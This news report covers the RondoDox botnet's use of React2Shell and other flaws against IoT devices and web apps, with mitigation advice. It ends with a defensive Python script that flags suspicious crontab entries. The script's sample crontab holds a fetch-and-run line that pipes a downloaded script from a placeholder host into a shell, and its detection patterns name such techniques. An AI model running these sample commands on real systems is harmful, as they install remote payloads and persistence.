Internet of Things (IoT) devices and web applications have been the target of a persistent nine-month campaign to enroll them in the RondoDox botnet. The activity has been seen using the recently revealed React2Shell vulnerability as an initial access vector as of December 2025.

As of December 31, 2025, approximately 90,300 instances were still vulnerable, with 68,400 of those in the United States, followed by Germany (4,300), France (2,800), and India (1,500). According to an analysis by CloudSEK, to reduce the risk posed by this threat organizations should update Next.js to a patched version as soon as possible, segment all IoT devices into dedicated VLANs, deploy Web Application Firewalls (WAFs), monitor for suspicious process execution, and block known C2 infrastructure. According to the researchers, the campaign has expanded its scope by acquiring new N-day security flaws, such as CVE-2023-1389 and CVE-2025-24893.

It's important to note that Darktrace, Kaspersky, and VulnCheck previously brought attention to the misuse of React2Shell to propagate the botnet. It has been discovered that one version of the tool can set up persistence using "/etc/crontab" and eliminate known botnets, Docker-based payloads, artifacts from previous campaigns, and related cron jobs.
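A defender-side check for the crontab persistence described above, added here as an example and not code from any of the cited reports: it parses text in system-crontab format and flags entries that match common persistence heuristics. The sample crontab, the 203.0.113.5 address (RFC 5737 documentation range) and the heuristic list are constructed for illustration, not taken from the campaign.

```python
import re
from typing import List, Tuple

# Constructed sample /etc/crontab content (not from any real infection)
SAMPLE_CRONTAB = """\
SHELL=/bin/sh
PATH=/usr/local/sbin:/usr/local/bin:/sbin:/bin:/usr/sbin:/usr/bin
# m h dom mon dow user command
17 * * * * root cd / && run-parts --report /etc/cron.hourly
*/5 * * * * root /tmp/.x/update.sh >/dev/null 2>&1
@reboot root wget -q http://203.0.113.5/bot.sh -O- | sh
0 3 * * * root /usr/bin/apt-get update
"""

# Hypothetical heuristics an analyst might start from; tune to your environment
SUSPICIOUS_PATTERNS = [
    (r"(?:^|\s)/(?:tmp|dev/shm|var/tmp)/", "runs from world-writable dir"),
    (r"\b(?:wget|curl)\b[^|]*\|\s*(?:sh|bash)\b", "download piped to shell"),
    (r"\bbase64\s+(?:-d|--decode)\b", "base64-decoded payload"),
    (r"\bchattr\s+\+i\b", "immutable flag set on files"),
]

def parse_crontab(text: str) -> List[Tuple[str, str, str]]:
    """Return (schedule, user, command) for each job line in system-crontab format."""
    jobs = []
    for line in text.splitlines():
        line = line.strip()
        # Skip blanks, comments and environment assignments such as SHELL=/bin/sh
        if not line or line.startswith("#") or re.match(r"^[A-Z_]+=", line):
            continue
        if line.startswith("@"):          # @reboot / @daily style schedule
            parts = line.split(None, 2)
        else:                             # five time fields, then user, then command
            parts = line.split(None, 6)
            parts = [" ".join(parts[:5])] + parts[5:]
        if len(parts) < 3:
            continue
        jobs.append((parts[0], parts[1], parts[2]))
    return jobs

def flag_suspicious(text: str) -> List[Tuple[str, str]]:
    """Return (command, reason) for each job whose command matches a heuristic."""
    hits = []
    for _, _, cmd in parse_crontab(text):
        for pattern, reason in SUSPICIOUS_PATTERNS:
            if re.search(pattern, cmd):
                hits.append((cmd, reason))
                break
    return hits
```

Run `flag_suspicious(open("/etc/crontab").read())` on a host to review its system crontab; the two constructed entries above are the ones it flags in the sample.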